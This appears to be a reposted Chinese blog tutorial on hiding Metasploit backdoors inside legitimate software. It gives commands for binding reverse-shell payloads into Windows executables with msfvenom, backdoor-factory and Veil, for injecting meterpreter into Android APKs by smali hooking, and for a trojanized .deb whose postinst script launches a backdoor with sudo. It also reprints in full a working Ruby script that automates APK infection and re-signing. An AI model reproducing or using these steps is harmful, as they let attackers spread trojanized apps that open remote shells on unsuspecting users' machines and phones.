码迷,mamicode.com
首页 > 其他好文 > 详细

Inject Payload Into Normal Files

时间:2016-11-18 00:09:42      阅读:451      评论:0      收藏:0      [点我收藏+]

标签:tap   start   pass   rebuild   dma   运行   写入   asi   ssi   

 Payload捆绑注入

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=xxx -e ... -f exe > testtmp.exe


backdoor-factory

在指定程序中注入payload
backdoor-factory -f Test.exe -S                   #检测是否支持注入
backdoor-factory -f Test.exe -s show                  #查看注入payload所需参数
backdoor-factory -f Test.exe -s .... -H <host> -P <Port> -a
backdoor -i -s reverse_shell_tcp -H AttackerHost -P port -a -D  #自动搜索应用程序(-i)并注入反弹payload(-a),并删除原文件(-D)
-u .moocowwow #-u参数则代表把原文件改为指定拓展名的文件

 

User supplied shellcode

msfpayload windows/exec CMD=calc.exe R > calc.bin
backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin

 

veil-evasion

>native/backdoor_factory
>set LHOST .....
>set LPORT
>set orig_exe /path/要注入的后门程序
>info 查看信息
>generate 生成payload
设置名字时不要加拓展名 

 

APK payload捆绑

(1)ruby apk-embed-payload.rb <Normal.apk> -p android/meterpreter/reverse_tcp LHOST=... LPORT=... -o /path/embed-backdoor.apk
(2)d2j-apk-sign 文件名     //重新对生成的APK文件签名(d2j-apk-sign kali自带)

逆向方式捆绑

(1)msfvenom -p ..... payload.apk
(2)apktool d /path/payload.apk
  apktool d /path/Normal_File.apk
  把逆向payload中的smail/com中的文件夹复制到正常文件逆向后的smail/com文件夹中
(3)在正常逆向的apk文件中的AndroidManifest.xml搜索 LAUNCHER
    如android:targetActive="com.facebook.nodex.startup.splashscreen.NodexSplashActivity">
    targetActive :程序开始的地方,根据此路径找到NodexSplashActivity.smali文件;
(4)在该文件中搜索onCreate:
    invoke-super {p0,p1}, Lcom/facebook/nodex/startup/splashscreen/AbstractNodexSplashActivity;
    ->onCreate(Landroid/os/Bundle;)V
  在该语句下方添加一条执行payload的语句:
  invoke-static {p0},Lcom/metaspolit/stage/Payload;->start(Landroid/content/Context;)V
(5)把payload AndroidManifest.xml 中 <user-permission abdroid:name="....">语句添加到正常APK对应位置
(6)重新编译APK文件: apktool b /Normal/
(7)d2j-apk-sign 文件名 #重新签名

 

 

Deb安装包中添加后门程序

(1)dpkg -x xx.deb xxx           #把xx.deb解包到xxx文件夹
(2)在xxx目录新建DEBIAN(必须大写)文件夹
(3)touch control postinst         #在DEBIAN文件夹新建control和postinst文件
(4)nano control               #写入软件包的信息,比较重要,如果有错误可能导致无法安装,所以建议直接复制原软件包中 control文件所有内容
(5)复制后门程序到解包文件夹下 /usr/bin 目录里
(6)vi postinst               #这个是安装软件是执行的脚本,这个也是我们后门程序运行的关键,内容可参考如下:
  #!/bin/sh
  sudo chmod 2775 /usr/bin/backdoor && sudo /usr/bin/backdoor & #执行后门程序,如这里backdoor
  sudo /usr/bin/xxx -V #安装后显示软件版本信息,这里参数可能不太一样,也可以自定义执行的参数

(7)chmod 555 postinst #postinst的执行权限为>=555且=<775
(8)dpkg-deb --build xxx/ xxx.deb #检查一遍没有问题就可以打包了

本机开始监听,软件发送到目标客户端执行。。。

 

ruby apk-embed-payload.rb

#!/usr/bin/env ruby
# apk_backdoor.rb
# This script is a POC for injecting metasploit payloads on http://vinayakwadhwa.in/apk-embed-payload.rb
# arbitrary APKs.
# Authored by timwr, Jack64
# Redistributed by PFSFX


require nokogiri
require fileutils
require optparse

# Find the activity thatapk_backdoor.rb  is opened when you click the app icon
def findlauncheractivity(amanifest)
    package = amanifest.xpath("//manifest").first[package]
    activities = amanifest.xpath("//activity|//activity-alias")
    for activity in activities
        activityname = activity.attribute("name")
        category = activity.search(category)
        unless category
            next
        end
        for cat in category
            categoryname = cat.attribute(name)
            if (categoryname.to_s == android.intent.category.LAUNCHER || categoryname.to_s == android.intent.action.MAIN)
                activityname = activityname.to_s
                unless activityname.start_with?(package)
                    activityname = package + activityname
                end
                return activityname
            end
        end
    end
end

# If XML parsing of the manifest fails, recursively search
# the smali code for the onCreate() hook and let the user
# pick the injection point
def scrapeFilesForLauncherActivity()
    smali_files||=[]
    Dir.glob(original/smali*/**/*.smali) do |file|
      checkFile=File.read(file)
      if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V")
        smali_files << file
        smalifile = file
        activitysmali = checkFile
      end
    end
    i=0
    print "[*] Please choose from one of the following:\n"
    smali_files.each{|s_file|
        print "[+] Hook point ",i,": ",s_file,"\n"
        i+=1
    }
    hook=-1
    while (hook < 0 || hook>i)
        print "\nHook: "
        hook = STDIN.gets.chomp.to_i
    end
    i=0
    smalifile=""
    activitysmali=""
    smali_files.each{|s_file|
        if (i==hook)
            checkFile=File.read(s_file)
            smalifile=s_file
            activitysmali = checkFile
            break
        end
        i+=1
    }
    return [smalifile,activitysmali]
end

def fix_manifest()
    payload_permissions=[]

    #Load payload‘s permissions
    File.open("payload/AndroidManifest.xml","r"){|file|
        k=File.read(file)
        payload_manifest=Nokogiri::XML(k)
        permissions = payload_manifest.xpath("//manifest/uses-permission")
        for permission in permissions
            name=permission.attribute("name")
            payload_permissions << name.to_s
        end
    #   print "#{k}"
    }
    original_permissions=[]
    apk_mani=‘‘

    #Load original apk‘s permissions
    File.open("original/AndroidManifest.xml","r"){|file2|
        k=File.read(file2)
        apk_mani=k
        original_manifest=Nokogiri::XML(k)
        permissions = original_manifest.xpath("//manifest/uses-permission")
        for permission in permissions
            name=permission.attribute("name")
            original_permissions << name.to_s
        end
    #   print "#{k}"
    }
    #Get permissions that are not in original APK
    add_permissions=[]
    for permission in payload_permissions
        if !(original_permissions.include? permission)
            print "[*] Adding #{permission}\n"
            add_permissions << permission
        end
    end
    inject=0
    new_mani=""
    #Inject permissions in original APK‘s manifest
    for line in apk_mani.split("\n")
        if (line.include? "uses-permission" and inject==0)
            for permission in add_permissions
                new_mani << <uses-permission android:name="+permission+"/>+"\n"
            end
            new_mani << line+"\n"
            inject=1
        else
            new_mani << line+"\n"
        end
    end
    File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani }
end

apkfile = ARGV[0]
unless(apkfile && File.readable?(apkfile))
    puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
    puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
    exit(1)
end

jarsigner = `which jarsigner`
unless(jarsigner && jarsigner.length > 0)
    puts "No jarsigner"
    exit(1)
end

apktool = `which apktool`
unless(apktool && apktool.length > 0)
    puts "No apktool"
    exit(1)
end

apk_v=`apktool`
unless(apk_v.split()[1].include?("v2."))
    puts "[-] Apktool version #{apk_v} not supported, please download the latest 2. version from git.\n"
    exit(1)
end

begin
    msfvenom_opts = ARGV[1,ARGV.length]
    opts=""
    msfvenom_opts.each{|x|
    opts+=x
    opts+=" "
    }
rescue
    puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
    puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
    puts "[-] Error parsing msfvenom options. Exiting.\n"
    exit(1)
end



print "[*] Generating msfvenom payload..\n"
res=`msfvenom -f raw #{opts} -o payload.apk 2>&1`
if res.downcase.include?("invalid" || "error")
    puts res
    exit(1)
end

print "[*] Signing payload..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey`

`rm -rf original`
`rm -rf payload`

`cp #{apkfile} original.apk`

print "[*] Decompiling orignal APK..\n"
`apktool d $(pwd)/original.apk -o $(pwd)/original`
print "[*] Decompiling payload APK..\n"
`apktool d $(pwd)/payload.apk -o $(pwd)/payload`

f = File.open("original/AndroidManifest.xml")
amanifest = Nokogiri::XML(f)
f.close

print "[*] Locating onCreate() hook..\n"


launcheractivity = findlauncheractivity(amanifest)
smalifile = original/smali/ + launcheractivity.gsub(/\./, "/") + .smali
begin
    activitysmali = File.read(smalifile)
rescue Errno::ENOENT
    print "[!] Unable to find correct hook automatically\n"
    begin
        results=scrapeFilesForLauncherActivity()
        smalifile=results[0]
        activitysmali=results[1]
    rescue
        puts "[-] Error finding launcher activity. Exiting"
        exit(1)
    end
end

print "[*] Copying payload files..\n"
FileUtils.mkdir_p(original/smali/com/metasploit/stage/)
FileUtils.cp Dir.glob(payload/smali/com/metasploit/stage/Payload*.smali), original/smali/com/metasploit/stage/
activitycreate = ;->onCreate(Landroid/os/Bundle;)V
payloadhook = activitycreate + "\n    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
hookedsmali = activitysmali.gsub(activitycreate, payloadhook)
print "[*] Loading ",smalifile," and injecting payload..\n"
File.open(smalifile, "w") {|file| file.puts hookedsmali }
injected_apk=apkfile.split(".")[0]
injected_apk+="_backdoored.apk"

print "[*] Poisoning the manifest with meterpreter permissions..\n"
fix_manifest()

print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original`
print "[*] Signing #{injected_apk} ..\n"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`

puts "[+] Infected file #{injected_apk} ready.\n"

 

 相关链接

  http://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/

  http://xiao106347.blog.163.com/blog/static/215992078201401223746744/

Inject Payload Into Normal Files

标签:tap   start   pass   rebuild   dma   运行   写入   asi   ssi   

原文地址:http://www.cnblogs.com/ssooking/p/5932136.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!